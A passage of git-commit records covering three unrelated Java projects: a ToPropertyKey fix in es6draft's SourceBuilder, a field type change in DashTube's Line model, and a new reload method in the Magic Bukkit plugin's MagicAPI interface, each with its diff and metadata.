Date(AnsiAttribute.TextColor.color(AnsiColor.Magenta), AnsiAttribute.DefaultTextColor), RegExp(AnsiAttribute.TextColor.color(AnsiColor.Red), AnsiAttribute.DefaultTextColor), ; /* @formatter:on */ private final int on; private final int off; private Style(AnsiAttribute on, AnsiAttribute off) { this(on.code, off.code); } private Style(int on, AnsiAttribute off) { this(on, off.code); } private Style(int on, int off) { this.on = on; this.off = off; } } public enum Mode { Simple, Color } /** * Returns the simple mode, source representation for {@code val}. * * @param cx * the execution context * @param val * the value * @return the source representation of the value */ public static String ToSource(ExecutionContext cx, Object val) { return ToSource(Mode.Simple, cx, val); } /** * Returns the source representation for {@code val}. * * @param mode * the source representation mode * @param cx * the execution context * @param val * the value * @return the source representation of the value */ public static String ToSource(Mode mode, ExecutionContext cx, Object val) { HashSet<ScriptObject> stack = new HashSet<>(); return toSource(mode, cx, stack, val); } private static String toSource(Mode mode, ExecutionContext cx, Set<ScriptObject> stack, Object value) { if (Type.isObject(value)) { ScriptObject objValue = Type.objectValue(value); Object toSource = Get(cx, objValue, "toSource"); if (IsCallable(toSource)) { return ToFlatString(cx, ((Callable) toSource).call(cx, objValue)); } } return format(mode, source(mode, cx, stack, value), style(stack, value)); } private static String format(Mode mode, String source, Style style) { if (mode == Mode.Simple || style == null) { return source; } return String.format("\u001B[%dm%s\u001B[%d;%dm", style.on, source, AnsiAttribute.Reset.code, style.off); } private static Style style(Set<ScriptObject> stack, Object value) { switch (Type.of(value)) { case Undefined: return Style.Undefined; case Null: return Style.Null; case Boolean: return Style.Boolean; case String: return Style.String; case Number: return Style.Number; case Symbol: return Style.Symbol; case Object: default: if (IsCallable(value)) { return Style.Special; } if (stack.contains(value)) { return Style.Special; } if (value instanceof DateObject) { return Style.Date; } if (value instanceof RegExpObject) { return Style.RegExp; } return null; } } private static String source(Mode mode, ExecutionContext cx, Set<ScriptObject> stack, Object value) { switch (Type.of(value)) { case Null: return "null"; case Boolean: return Type.booleanValue(value) ? "true" : "false"; case String: return stringToSource(Type.stringValue(value)); case Symbol: return Type.symbolValue(value).toString(); case Number: return ToFlatString(cx, value); case Object: ScriptObject objValue = Type.objectValue(value); if (IsCallable(objValue)) { return ((Callable) objValue).toSource(); } if (stack.contains(objValue) || stack.size() > MAX_STACK_DEPTH) { return "« ... »"; } stack.add(objValue); try { if (objValue instanceof DateObject) { return DatePrototype.Properties.toString(cx, value).toString(); } else if (objValue instanceof RegExpObject) { return RegExpPrototype.Properties.toString(cx, value).toString(); } else if (objValue instanceof ExoticArray) { return arrayToSource(mode, cx, stack, objValue); } else { return objectToSource(mode, cx, stack, objValue); } } finally { stack.remove(objValue); } case Undefined: default: return "(void 0)"; } } private static final char[] hexdigits = { '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f' }; private static String stringToSource(CharSequence value) { StringBuilder sb = new StringBuilder(value.length() + 2); sb.append('"'); for (int i = 0, len = value.length(); i < len; ++i) { char c = value.charAt(i); switch (c) { case '"': case '\\': sb.append('\\').append(c); break; case '\b': sb.append("\\b"); break; case '\f': sb.append("\\f"); break; case '\n': sb.append("\\n"); break; case '\r': sb.append("\\r"); break; case '\t': sb.append("\\t"); break; default: if (c < 0x20 || c > 0xff) { sb.append('\\').append('u').append(hexdigits[(c >> 12) & 0xf]) .append(hexdigits[(c >> 8) & 0xf]).append(hexdigits[(c >> 4) & 0xf]) .append(hexdigits[(c >> 0) & 0xf]); } else { sb.append(c); } } } sb.append('"'); return sb.toString(); } private static final Pattern namePattern = Pattern .compile("\\p{javaJavaIdentifierStart}\\p{javaJavaIdentifierPart}*"); private static String propertyKeyToSource(Mode mode, Object key) { if (key instanceof String) { String s = (String) key; if (namePattern.matcher(s).matches()) { return s; } return format(mode, stringToSource(s), Style.String); } assert key instanceof Symbol; String description = ((Symbol) key).getDescription(); if (description == null) { description = "Symbol()"; } return format(mode, String.format("[%s]", description), Style.Symbol); } private static Property getOwnProperty(ExecutionContext cx, ScriptObject object, Object key) { try { if (key instanceof String) { return object.getOwnProperty(cx, (String) key); } else { return object.getOwnProperty(cx, (Symbol) key); } } catch (ScriptException e) { return null; } } private static String accessorToSource(Mode mode, Property accessor) { String description; if (accessor.getGetter() != null && accessor.getSetter() != null) { description = "[Getter/Setter]"; } else if (accessor.getGetter() != null) { description = "[Getter]"; } else if (accessor.getSetter() != null) { description = "[Setter]"; } else { description = "[]"; } return format(mode, description, Style.Special); } private static String objectToSource(Mode mode, ExecutionContext cx, Set<ScriptObject> stack, ScriptObject object) { Iterator<?> keys = GetOwnPropertyNamesIterator(cx, object); if (!keys.hasNext()) { return "{}"; } StringBuilder properties = new StringBuilder(); for (int i = 0; keys.hasNext() && i < MAX_OBJECT_PROPERTIES;) { Object k = keys.next(); String key = propertyKeyToSource(mode, k); Property prop = getOwnProperty(cx, object, k); if (prop == null || !prop.isEnumerable()) { continue; } String value; if (prop.isDataDescriptor()) { value = toSource(mode, cx, stack, prop.getValue()); } else { value = accessorToSource(mode, prop); } properties.append(", ").append(key).append(": ").append(value); i += 1; } if (keys.hasNext()) { properties.append(", [...]"); } properties.append(" }").setCharAt(0, '{'); return properties.toString(); } private static String arrayToSource(Mode mode, ExecutionContext cx, Set<ScriptObject> stack, ScriptObject array) { long len = ToUint32(cx, Get(cx, array, "length")); if (len <= 0) { return "[]"; } int viewLen = (int) Math.min(len, MAX_ARRAY_PROPERTIES); StringBuilder properties = new StringBuilder(); for (int index = 0; index < viewLen; ++index) { String value = toSource(mode, cx, stack, Get(cx, array, ToString(index))); properties.append(", ").append(value); } if (viewLen < len) { properties.append(", [...]"); } properties.append(" ]").setCharAt(0, '['); return properties.toString(); } }
Add missing ToPropertyKey conversion
src/main/java/com/github/anba/es6draft/repl/SourceBuilder.java
Add missing ToPropertyKey conversion
<ide><path>rc/main/java/com/github/anba/es6draft/repl/SourceBuilder.java <ide> } <ide> StringBuilder properties = new StringBuilder(); <ide> for (int i = 0; keys.hasNext() && i < MAX_OBJECT_PROPERTIES;) { <del> Object k = keys.next(); <add> Object k = ToPropertyKey(cx, keys.next()); <ide> String key = propertyKeyToSource(mode, k); <ide> Property prop = getOwnProperty(cx, object, k); <ide> if (prop == null || !prop.isEnumerable()) {
Java
apache-2.0
d4cd731ec2a865b128e6e4eb4d173178363115b9
0
chriswalker/DashTube
/* * Copyright 2013 That Amazing Web Ltd. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.taw.dashtube.model; import com.google.api.client.util.Key; import com.google.api.client.xml.GenericXml; /** * Simple class encapsulating the &lt;Line&gt; element. */ public class Line extends GenericXml { @Key("@ID") public String id; @Key("@Name") public String name; }
DashTube/src/main/java/com/taw/dashtube/model/Line.java
/* * Copyright 2013 That Amazing Web Ltd. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.taw.dashtube.model; import com.google.api.client.util.Key; import com.google.api.client.xml.GenericXml; /** * Simple class encapsulating the &lt;Line&gt; element. */ public class Line extends GenericXml { @Key("@ID") public int id; @Key("@Name") public String name; }
Change ID to String (easier for comparisons)
DashTube/src/main/java/com/taw/dashtube/model/Line.java
Change ID to String (easier for comparisons)
<ide><path>ashTube/src/main/java/com/taw/dashtube/model/Line.java <ide> */ <ide> public class Line extends GenericXml { <ide> @Key("@ID") <del> public int id; <add> public String id; <ide> @Key("@Name") <ide> public String name; <ide> }
Java
mit
691c7039d5ee2e905a21066c2ab269b50c0facd4
0
elBukkit/MagicAPI,elBukkit/MagicPlugin,elBukkit/MagicPlugin,elBukkit/MagicPlugin
package com.elmakers.mine.bukkit.api.magic; import java.util.Collection; import java.util.logging.Logger; import com.elmakers.mine.bukkit.api.block.UndoList; import com.elmakers.mine.bukkit.api.spell.SpellCategory; import org.bukkit.Material; import org.bukkit.command.CommandSender; import org.bukkit.configuration.ConfigurationSection; import org.bukkit.entity.Entity; import org.bukkit.entity.Player; import org.bukkit.inventory.ItemStack; import org.bukkit.plugin.Plugin; import com.elmakers.mine.bukkit.api.spell.SpellTemplate; import com.elmakers.mine.bukkit.api.wand.LostWand; import com.elmakers.mine.bukkit.api.wand.Wand; /*! \mainpage Magic Bukkit Plugin API * * \section intro_sec Introduction * * This is the API for the Magic plugin for Bukkit. Other plugins can * use this API to integrate with Magic. * * If you wish to extend Magic, such as by adding a completely new Spell * or EffectPlayer class, you will need to build against MagicLib: * * http://jenkins.elmakers.com/job/MagicLib/doxygen/ * * \section issues_sec Issues * * For issues with the API, or suggestions, use our Issue Tracker: * * http://jira.elmakers.com/browse/API/ * * \section start_sec Getting Started * * If you haven't done so already, get started with Bukkit by getting a basic * shell of a plugin working. You should at least have a working Plugin that * loads in Bukkit (add a debug print to onEnable to be sure!) before you * start trying to integrate with other Plugins. See here for general help: * * http://wiki.bukkit.org/Plugin_Tutorial * * \section maven_sec Building with Maven * * Once you have a project set up, it is easy to build against the Magic API * with Maven. Simply add the elmakers repository to your repository list, * and then add a dependency for MagicAPI. A typical setup would look like: * * <pre> * &lt;dependencies&gt; * &lt;dependency&gt; * &lt;groupId&gt;org.bukkit&lt;/groupId&gt; * &lt;artifactId&gt;bukkit&lt;/artifactId&gt; * &lt;version&gt;1.6.4-R2.0&lt;/version&gt; * &lt;scope&gt;provided&lt;/scope&gt; * &lt;/dependency&gt; * &lt;dependency&gt; * &lt;groupId&gt;com.elmakers.mine.bukkit&lt;/groupId&gt; * &lt;artifactId&gt;MagicAPI&lt;/artifactId&gt; * &lt;version&gt;1.0&lt;/version&gt; * &lt;scope&gt;provided&lt;/scope&gt; * &lt;/dependency&gt; * &lt;/dependencies&gt; * &lt;repositories&gt; * &lt;repository&gt; * &lt;id&gt;bukkit-repo&lt;/id&gt; * &lt;url&gt;http://repo.bukkit.org/content/groups/public/ &lt;/url&gt; * &lt;/repository&gt; * &lt;repository&gt; * &lt;id&gt;elmakers-repo&lt;/id&gt; * &lt;url&gt;http://maven.elmakers.com/repository/ &lt;/url&gt; * &lt;/repository&gt; * &lt;/repositories&gt; * </pre> * * \section plugin_sec Getting the API reference * * A Plugin that wishes to interact with Magic should generally check * the PluginManager for the "Magic" plugin. If present, the Plugin may * cast it to MagicAPI and use it. * * If you wish to softdepend to Magic, make sure to not use any of these API classes * unless you know the Magic plugin is loaded. Make sure you're not building the API * into your plugin, it should always be referenced externally (e.g. "provided" in Maven). * * <pre> * public MagicAPI getMagicAPI() { * Plugin magicPlugin = Bukkit.getPluginManager().getPlugin("Magic"); * if (magicPlugin == null || !(magicPlugin instanceof MagicAPI)) { * return null; * } * return (MagicAPI)magicPlugin; * } * </pre> * * \section example_sec Examples * * \subsection casting Casting Spells * * A plugin may cast spells directly, or on behalf of logged in players. * * \subsection wands Creating Wands * * A plugin may create or modify Wand items. */ /** * This is the primary entry point into the Magic API. * * A Plugin should generally check for the "Magic" plugin, and * then cast that Plugin to MagicAPI to interact with it. * */ public interface MagicAPI { /** * Retrieve the Bukkit Plugin for Magic * * @return The Magic Plugin instance, likely "this" */ public Plugin getPlugin(); /** * Retrieve the Logger for this API instance. * * @return The logger being used by the API provider (usually MagicPlugin). */ public Logger getLogger(); /** * Check to see if a CommandSender has permission. * * This extends Bukkit's permission checks to account for special * Magic bypass flags and Autonoma behavior. * * @param sender The CommandSender, may also be a Player or null. * @param pNode The permission node to check * @return True if the CommandSender has the requested permission */ public boolean hasPermission(CommandSender sender, String pNode); /** * Check for permission, but include a default permission. This is generally used * to do permission checks against something you can't specify in the defaults (such * as a dynamically generated list), but would like permission to be enabled by * default. * * This is used, for instance, in Magic's list of wands and spells- players have * access to all spells by default, unless a -Magic.cast.spellname pnode is added. * * @param sender The CommandSender, may also be a Player or null. * @param pNode The permission node to check * @param defaultPermission set to true to enable permission by default * @return True if the sender has permission */ public boolean hasPermission(CommandSender sender, String pNode, boolean defaultPermission); /** * Save all Magic data. */ public void save(); /** * Reload all Magic configurations. */ public void reload(); /** * Reload all Magic configurations, report success/fail to sender */ public void reload(CommandSender sender); /** * Clear all image and schematic caches */ public void clearCache(); /** * Commit and clear all loaded undo queues * * @return True if anything was committed */ public boolean commit(); /** * Get all currently loaded Mage instances. * * These may be players or Automata (command blocks) * * @return The list of all currently active mages. */ public Collection<Mage> getMages(); /** * Get all currently loaded Mage instances that have * pending construction batches. * * These may be players or Automata (command blocks) * * @return The list of Mages that have pending constructions in progress. */ public Collection<Mage> getMagesWithPendingBatches(); public Collection<UndoList> getPendingUndo(); /** * Retrieve or create a Mage for a particular CommandSender. * * There is one Mage for the Console sender, one Mage for each Player, * and one Mage for each named Command Block. * * Each Mage is persistent and singular- two command blocks with the same * name, if loaded at the same time, will use the same Mage. This may * cause conflicts with cooldowns or other persistent Spell data. * * @param sender the CommandSender (Player, Command block, etc) to turn into a Mage * @return Mage instance, new, created or loaded. */ public Mage getMage(CommandSender sender); /** * Retrieve or create a Mage for a particular Entity. * * Every Entity should use its own Mage for casting spells. Entity * Mages are tracked by UUID, and their data is saved and restored * as normal. * * @param entity the Entity to turn into a Mage * @param sender the CommandSender to use, optional * @return Mage instance, new, created or loaded. */ public Mage getMage(Entity entity, CommandSender sender); /** * A utility method for giving an item to a player. This will place * the item in the player's hand if it is empty, else in the player's * inventory. If there is no room, the item will drop on the ground. * * If the item is a Wand, and it goes into the player's hand, it * will be activated. Make sure to use this method, or else make * sure to deal with activating wands as the player gets them. * * @param player The Player to give an item to * @param itemStack The ItemStack to giev the player, may be a Wand. */ public void giveItemToPlayer(Player player, ItemStack itemStack); /** * Give experience to a player, in a way that is safe for wands. * * This method may get removed in the future if Wands can be smarter * about XP being added externally. * * @param player The Player to give XP * @param xp The amount of XP to give */ public void giveExperienceToPlayer(Player player, int xp); /** * A utility method to get the names of all currently logged-in Players. * * Useful for tab-completion. * * @return The names of all logged-in players. */ public Collection<String> getPlayerNames(); /** * Retrieve the keys for all wand templates. These can be used * with createWand to create a new Wand from a template. * * @return A list of all known wand template keys. */ public Collection<String> getWandKeys(); /** * Create a new Magic item. This could be a wand, spell, upgrade * or brush. * * @param magicItemKey The template key, may be a wand, spell, etc. * @return An ItemStack representing the magic item. */ public ItemStack createItem(String magicItemKey); public ItemStack createItem(String magicItemKey, Mage mage); /** * Create a generic version of an item with no extra data. * @param magicItemKey The template key, may be a wand, spell, etc. * @return The specified item. */ public ItemStack createGenericItem(String magicItemKey); /** * Return the key name of an item, so it can be re-created with * createItem. * * @param item * @return */ public String getItemKey(ItemStack item); /** * Return a string description of an item. * * This will use the display name if set, then Vault if * present, then falling back to the Material name. * * @param item * @return A description of this item */ public String describeItem(ItemStack item); /** * Check to see if a player has a specific item. * * @param player * @param item * @return */ public boolean hasItem(Player player, ItemStack item); /** * Check to see if a player has a specific item, and remove it * from the player's inventory. * * @param player * @param item * @return */ public boolean takeItem(Player player, ItemStack item); /** * Create a new Wand from a template. * * Once created, a Wand is a unique item. It "remembers" which template * it was created from, but this is currently not used for anything. * * @param wandKey The template key, or blank for a default wand. * @return A new Wand instance, with a useable ItemStack. */ public Wand createWand(String wandKey); /** * Create an upgrade Wand item from a template. * * This can be used to create upgrade items from wand * templates that are not originally meant to be upgrades. * * @param wandKey The template key * @return A new Wand instance, converted to an upgrade if necessary. */ public Wand createUpgrade(String wandKey); /** * Load a Wand instance of an ItemStack. Will return null if the * given ItemStack does not have Wand NMS data. * * @param item The item to load Wand data from. * @return The wand instance, or null on error. */ public Wand getWand(ItemStack item); /** * Turn the given ItemStack into a wand * * @param item The item to use as the wand's icon. * @return The wand instance, or null on error. */ public Wand createWand(ItemStack item); /** * Create a new Wand instance out of a given Material type. * * This will create a new ItemStack to represent the Wand. * * @param iconMaterial The type of Material to use as the Wand icon. * @param iconData Data used for durability or icon variants. * @return A newly-created Wand. */ public Wand createWand(Material iconMaterial, short iconData); /** * Check to see if an existing item is a Wand. This will inspect * the item's NBT data. * * @param item The ItemStack to inspect. * @return true if the item is a Wand, in which case getWand can be used. */ public boolean isWand(ItemStack item); /** * Check to see if an existing item is a wand upgrade. This will inspect * the item's NBT data. * * @param item The ItemStack to inspect. * @return true if the item is a wand upgrade, in which case getWand can be used. */ public boolean isUpgrade(ItemStack item); /** * Check to see if an existing item is a spell item. This will inspect * the item's NBT data. * * @param item The ItemStack to inspect. * @return true if the item is a spell, in which case getSpell can be used. */ public boolean isSpell(ItemStack item); /** * Check to see if an existing item is a material brush item. This will inspect * the item's NBT data. * * @param item The ItemStack to inspect. * @return true if the item is a wand upgrade, in which case getBrush can be used. */ public boolean isBrush(ItemStack item); /** * Get the key of the Spell or SpellTemplate represented by an item. * * @param item The item to inspect * @return The key of the Spell represented by this item. */ public String getSpell(ItemStack item); /** * Get the key of the material brush represented by an item. * * @param item The item to inspect * @return The key of the material brush represented by this item. */ public String getBrush(ItemStack item); /** * Create an ItemStack that represents a Spell. * * This item will be absorbed by a Wand on activate, adding that Spell * to the Wand, if the Wand finds this item in a Player's inventory. * * @param spellKey The Spell to create an item for. * @return A new ItemStack, or null on error. */ public ItemStack createSpellItem(String spellKey); /** * Create an ItemStack that represents a Material Brush. * * This item will be absorbed by a Wand on activate, adding that brush * to the Wand, if the Wand finds this item in a Player's inventory. * * @param brushKey The Material brush to create an item for. * @return A new ItemStack, or null on error. */ public ItemStack createBrushItem(String brushKey); /** * Return a list of all known LostWand records. * * @return A list of all known LostWand data. */ public Collection<LostWand> getLostWands(); /** * Forget a specific LostWand. * * The ItemStack will not be removed if it still exists, and * a new LostWand record may get created if the ItemStack is found * again by the Chunk scanner. * * @param id The id of the LostWand to forget. */ public void removeLostWand(String id); /** * Get a list of all known Automaton records. * * @return The list of currently known Automaton blocks. */ public Collection<Automaton> getAutomata(); /** * Cast a specific Spell, with optional parameters. * * The parameters are generally in alternating key/value format, such as * * {"radius", "32", "range", "64"} * * This Spell will be cast using the COMMAND Mage. * * @param spellName The key name of the Spell to cast * @param parameters A list of parameters, as if cast from the command-line. * @return true if the spell succeeds, else false */ public boolean cast(String spellName, String[] parameters); /** * Cast a specific Spell, with optional parameters, using a specific CommandSender and/or Player. * * The parameters are generally in alternating key/value format, such as * * {"radius", "32", "range", "64"} * * The CommandSender and Player may differ, in which case both will be notified of Spell results. * * @param spellName The key name of the Spell to cast * @param parameters A list of parameters, as if cast from the command-line. * @param sender The CommandSender that originated this Spell * @param entity The Entity this Spell is cast on behalf of, may be Player or differ from sender * @return true if the spell succeeds, else false */ public boolean cast(String spellName, String[] parameters, CommandSender sender, Entity entity); public boolean cast(String spellName, ConfigurationSection parameters, CommandSender sender, Entity entity); /** * Get a list of all currently loaded SpellTemplate records, as defined in spells.defaults.yml * and spells.yml * * A Spell is created for a Mage from a SpellTemplate. * * @return A list of all known SpellTemplate definitions. */ public Collection<SpellTemplate> getSpellTemplates(); public Collection<SpellTemplate> getSpellTemplates(boolean showHidden); /** * Retrieve a specific SpellTemplate. * * @param key The key of the SpellTemplate to look up. * @return The requested SpellTemplate, or null on failure. */ public SpellTemplate getSpellTemplate(String key); /** * Get a list of all valid Material Brush names. * * This will include all Block Materials, as well as special brushes * (copy, clone, erase, replicate, map) and any known schematic brushes. * * @return A list of all valid brush keys. */ public Collection<String> getBrushes(); /** * Get a list of all known schematics. * * These will be loaded from Magic's built-in schematic collection, * or from an external source (e.g. WorldEdit). * * The list may be empty if schematics are disabled. * * These are the raw schematic names, and do not have the "schematic:" prefix or ".schematic" extension. * * @return The list of known schematic names. */ public Collection<String> getSchematicNames(); /** * Get the MageController. * * The controller is used for more advanced plugin interaction, and is * used heavily by Spells themselves to interact with the Magic plugin's * internal functionality. * * @return The current MageController, there is only one. */ public MageController getController(); /** * Returns a written book item describing all of the spells in * a given category. * * @param category The category to look up * @param count How many to give (max 1 stack) * @return An ItemStack spell book */ public ItemStack getSpellBook(SpellCategory category, int count); /** * Return the Messages controller, which manages Magic's * localization store. */ public Messages getMessages(); }
src/main/java/com/elmakers/mine/bukkit/api/magic/MagicAPI.java
package com.elmakers.mine.bukkit.api.magic; import java.util.Collection; import java.util.logging.Logger; import com.elmakers.mine.bukkit.api.block.UndoList; import com.elmakers.mine.bukkit.api.spell.SpellCategory; import org.bukkit.Material; import org.bukkit.command.CommandSender; import org.bukkit.configuration.ConfigurationSection; import org.bukkit.entity.Entity; import org.bukkit.entity.Player; import org.bukkit.inventory.ItemStack; import org.bukkit.plugin.Plugin; import com.elmakers.mine.bukkit.api.spell.SpellTemplate; import com.elmakers.mine.bukkit.api.wand.LostWand; import com.elmakers.mine.bukkit.api.wand.Wand; /*! \mainpage Magic Bukkit Plugin API * * \section intro_sec Introduction * * This is the API for the Magic plugin for Bukkit. Other plugins can * use this API to integrate with Magic. * * If you wish to extend Magic, such as by adding a completely new Spell * or EffectPlayer class, you will need to build against MagicLib: * * http://jenkins.elmakers.com/job/MagicLib/doxygen/ * * \section issues_sec Issues * * For issues with the API, or suggestions, use our Issue Tracker: * * http://jira.elmakers.com/browse/API/ * * \section start_sec Getting Started * * If you haven't done so already, get started with Bukkit by getting a basic * shell of a plugin working. You should at least have a working Plugin that * loads in Bukkit (add a debug print to onEnable to be sure!) before you * start trying to integrate with other Plugins. See here for general help: * * http://wiki.bukkit.org/Plugin_Tutorial * * \section maven_sec Building with Maven * * Once you have a project set up, it is easy to build against the Magic API * with Maven. Simply add the elmakers repository to your repository list, * and then add a dependency for MagicAPI. A typical setup would look like: * * <pre> * &lt;dependencies&gt; * &lt;dependency&gt; * &lt;groupId&gt;org.bukkit&lt;/groupId&gt; * &lt;artifactId&gt;bukkit&lt;/artifactId&gt; * &lt;version&gt;1.6.4-R2.0&lt;/version&gt; * &lt;scope&gt;provided&lt;/scope&gt; * &lt;/dependency&gt; * &lt;dependency&gt; * &lt;groupId&gt;com.elmakers.mine.bukkit&lt;/groupId&gt; * &lt;artifactId&gt;MagicAPI&lt;/artifactId&gt; * &lt;version&gt;1.0&lt;/version&gt; * &lt;scope&gt;provided&lt;/scope&gt; * &lt;/dependency&gt; * &lt;/dependencies&gt; * &lt;repositories&gt; * &lt;repository&gt; * &lt;id&gt;bukkit-repo&lt;/id&gt; * &lt;url&gt;http://repo.bukkit.org/content/groups/public/ &lt;/url&gt; * &lt;/repository&gt; * &lt;repository&gt; * &lt;id&gt;elmakers-repo&lt;/id&gt; * &lt;url&gt;http://maven.elmakers.com/repository/ &lt;/url&gt; * &lt;/repository&gt; * &lt;/repositories&gt; * </pre> * * \section plugin_sec Getting the API reference * * A Plugin that wishes to interact with Magic should generally check * the PluginManager for the "Magic" plugin. If present, the Plugin may * cast it to MagicAPI and use it. * * If you wish to softdepend to Magic, make sure to not use any of these API classes * unless you know the Magic plugin is loaded. Make sure you're not building the API * into your plugin, it should always be referenced externally (e.g. "provided" in Maven). * * <pre> * public MagicAPI getMagicAPI() { * Plugin magicPlugin = Bukkit.getPluginManager().getPlugin("Magic"); * if (magicPlugin == null || !(magicPlugin instanceof MagicAPI)) { * return null; * } * return (MagicAPI)magicPlugin; * } * </pre> * * \section example_sec Examples * * \subsection casting Casting Spells * * A plugin may cast spells directly, or on behalf of logged in players. * * \subsection wands Creating Wands * * A plugin may create or modify Wand items. */ /** * This is the primary entry point into the Magic API. * * A Plugin should generally check for the "Magic" plugin, and * then cast that Plugin to MagicAPI to interact with it. * */ public interface MagicAPI { /** * Retrieve the Bukkit Plugin for Magic * * @return The Magic Plugin instance, likely "this" */ public Plugin getPlugin(); /** * Retrieve the Logger for this API instance. * * @return The logger being used by the API provider (usually MagicPlugin). */ public Logger getLogger(); /** * Check to see if a CommandSender has permission. * * This extends Bukkit's permission checks to account for special * Magic bypass flags and Autonoma behavior. * * @param sender The CommandSender, may also be a Player or null. * @param pNode The permission node to check * @return True if the CommandSender has the requested permission */ public boolean hasPermission(CommandSender sender, String pNode); /** * Check for permission, but include a default permission. This is generally used * to do permission checks against something you can't specify in the defaults (such * as a dynamically generated list), but would like permission to be enabled by * default. * * This is used, for instance, in Magic's list of wands and spells- players have * access to all spells by default, unless a -Magic.cast.spellname pnode is added. * * @param sender The CommandSender, may also be a Player or null. * @param pNode The permission node to check * @param defaultPermission set to true to enable permission by default * @return True if the sender has permission */ public boolean hasPermission(CommandSender sender, String pNode, boolean defaultPermission); /** * Save all Magic data. */ public void save(); /** * Reload all Magic configurations. */ public void reload(); /** * Clear all image and schematic caches */ public void clearCache(); /** * Commit and clear all loaded undo queues * * @return True if anything was committed */ public boolean commit(); /** * Get all currently loaded Mage instances. * * These may be players or Automata (command blocks) * * @return The list of all currently active mages. */ public Collection<Mage> getMages(); /** * Get all currently loaded Mage instances that have * pending construction batches. * * These may be players or Automata (command blocks) * * @return The list of Mages that have pending constructions in progress. */ public Collection<Mage> getMagesWithPendingBatches(); public Collection<UndoList> getPendingUndo(); /** * Retrieve or create a Mage for a particular CommandSender. * * There is one Mage for the Console sender, one Mage for each Player, * and one Mage for each named Command Block. * * Each Mage is persistent and singular- two command blocks with the same * name, if loaded at the same time, will use the same Mage. This may * cause conflicts with cooldowns or other persistent Spell data. * * @param sender the CommandSender (Player, Command block, etc) to turn into a Mage * @return Mage instance, new, created or loaded. */ public Mage getMage(CommandSender sender); /** * Retrieve or create a Mage for a particular Entity. * * Every Entity should use its own Mage for casting spells. Entity * Mages are tracked by UUID, and their data is saved and restored * as normal. * * @param entity the Entity to turn into a Mage * @param sender the CommandSender to use, optional * @return Mage instance, new, created or loaded. */ public Mage getMage(Entity entity, CommandSender sender); /** * A utility method for giving an item to a player. This will place * the item in the player's hand if it is empty, else in the player's * inventory. If there is no room, the item will drop on the ground. * * If the item is a Wand, and it goes into the player's hand, it * will be activated. Make sure to use this method, or else make * sure to deal with activating wands as the player gets them. * * @param player The Player to give an item to * @param itemStack The ItemStack to giev the player, may be a Wand. */ public void giveItemToPlayer(Player player, ItemStack itemStack); /** * Give experience to a player, in a way that is safe for wands. * * This method may get removed in the future if Wands can be smarter * about XP being added externally. * * @param player The Player to give XP * @param xp The amount of XP to give */ public void giveExperienceToPlayer(Player player, int xp); /** * A utility method to get the names of all currently logged-in Players. * * Useful for tab-completion. * * @return The names of all logged-in players. */ public Collection<String> getPlayerNames(); /** * Retrieve the keys for all wand templates. These can be used * with createWand to create a new Wand from a template. * * @return A list of all known wand template keys. */ public Collection<String> getWandKeys(); /** * Create a new Magic item. This could be a wand, spell, upgrade * or brush. * * @param magicItemKey The template key, may be a wand, spell, etc. * @return An ItemStack representing the magic item. */ public ItemStack createItem(String magicItemKey); public ItemStack createItem(String magicItemKey, Mage mage); /** * Create a generic version of an item with no extra data. * @param magicItemKey The template key, may be a wand, spell, etc. * @return The specified item. */ public ItemStack createGenericItem(String magicItemKey); /** * Return the key name of an item, so it can be re-created with * createItem. * * @param item * @return */ public String getItemKey(ItemStack item); /** * Return a string description of an item. * * This will use the display name if set, then Vault if * present, then falling back to the Material name. * * @param item * @return A description of this item */ public String describeItem(ItemStack item); /** * Check to see if a player has a specific item. * * @param player * @param item * @return */ public boolean hasItem(Player player, ItemStack item); /** * Check to see if a player has a specific item, and remove it * from the player's inventory. * * @param player * @param item * @return */ public boolean takeItem(Player player, ItemStack item); /** * Create a new Wand from a template. * * Once created, a Wand is a unique item. It "remembers" which template * it was created from, but this is currently not used for anything. * * @param wandKey The template key, or blank for a default wand. * @return A new Wand instance, with a useable ItemStack. */ public Wand createWand(String wandKey); /** * Create an upgrade Wand item from a template. * * This can be used to create upgrade items from wand * templates that are not originally meant to be upgrades. * * @param wandKey The template key * @return A new Wand instance, converted to an upgrade if necessary. */ public Wand createUpgrade(String wandKey); /** * Load a Wand instance of an ItemStack. Will return null if the * given ItemStack does not have Wand NMS data. * * @param item The item to load Wand data from. * @return The wand instance, or null on error. */ public Wand getWand(ItemStack item); /** * Turn the given ItemStack into a wand * * @param item The item to use as the wand's icon. * @return The wand instance, or null on error. */ public Wand createWand(ItemStack item); /** * Create a new Wand instance out of a given Material type. * * This will create a new ItemStack to represent the Wand. * * @param iconMaterial The type of Material to use as the Wand icon. * @param iconData Data used for durability or icon variants. * @return A newly-created Wand. */ public Wand createWand(Material iconMaterial, short iconData); /** * Check to see if an existing item is a Wand. This will inspect * the item's NBT data. * * @param item The ItemStack to inspect. * @return true if the item is a Wand, in which case getWand can be used. */ public boolean isWand(ItemStack item); /** * Check to see if an existing item is a wand upgrade. This will inspect * the item's NBT data. * * @param item The ItemStack to inspect. * @return true if the item is a wand upgrade, in which case getWand can be used. */ public boolean isUpgrade(ItemStack item); /** * Check to see if an existing item is a spell item. This will inspect * the item's NBT data. * * @param item The ItemStack to inspect. * @return true if the item is a spell, in which case getSpell can be used. */ public boolean isSpell(ItemStack item); /** * Check to see if an existing item is a material brush item. This will inspect * the item's NBT data. * * @param item The ItemStack to inspect. * @return true if the item is a wand upgrade, in which case getBrush can be used. */ public boolean isBrush(ItemStack item); /** * Get the key of the Spell or SpellTemplate represented by an item. * * @param item The item to inspect * @return The key of the Spell represented by this item. */ public String getSpell(ItemStack item); /** * Get the key of the material brush represented by an item. * * @param item The item to inspect * @return The key of the material brush represented by this item. */ public String getBrush(ItemStack item); /** * Create an ItemStack that represents a Spell. * * This item will be absorbed by a Wand on activate, adding that Spell * to the Wand, if the 